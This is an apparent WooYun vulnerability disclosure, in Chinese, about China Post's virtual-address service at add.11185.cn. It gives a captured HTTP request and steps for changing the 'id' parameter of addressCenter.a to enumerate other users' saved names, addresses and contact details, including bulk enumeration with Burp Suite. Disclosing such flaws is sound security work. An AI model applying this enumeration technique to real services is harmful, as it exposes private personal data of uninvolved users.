WooYun.org

http://add.11185.cn/vir_add_front/owner/addressService.a
中国邮政网上营业厅 - 虚实地址服务
虚实地址服务是邮政在互联网时代为用户提供的基于地址的基础服务。用户注册后可将手机号、QQ号、邮箱账号等虚拟账号信息与自己的实际地址进行绑定，绑定后可以直接使用虚拟账号信息（手机、QQ、邮箱）做为自己的收件地址，便捷安全。我们还将为完成身份认证和地址校验的用户分配您个人专属的POST ID ，届时您可以使用我们在社交平台、电商平台、本地生活、邮政服务等各个领域为您带来的便捷安全的贴心服务。

首先你要注册一个帐号，并且有一只可以接收验证码的手机..

（所在地区，详细地址，收货人姓名，电子邮箱）都可以先乱填一个，
但是手机号要填写正确的，因为要用来接收验证码..获取到验证码之后点击保存

然后我们点击修改地，抓包获取到一个GET请求

GET /vir_add_front/owner/addressCenter.a?id=963 HTTP/1.1
Host: add.11185.cn
Proxy-Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.154 Safari/537.36
Referer: http://add.11185.cn/vir_add_front/owner/addressCenter.a
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8

直接修改addressCenter.a?id=963，修改成想要遍历的用户id
addressCenter.a?id=961

addressCenter.a?id=949

addressCenter.a?id=943

有一些ID遍历不到，可能是因为没有填写收货地址...
然后我只要用burpsuite跑一下，就可以跑出有填写收货地址的id了..

我的burpsuite有乱码，懒得弄..访问网页的话看是正常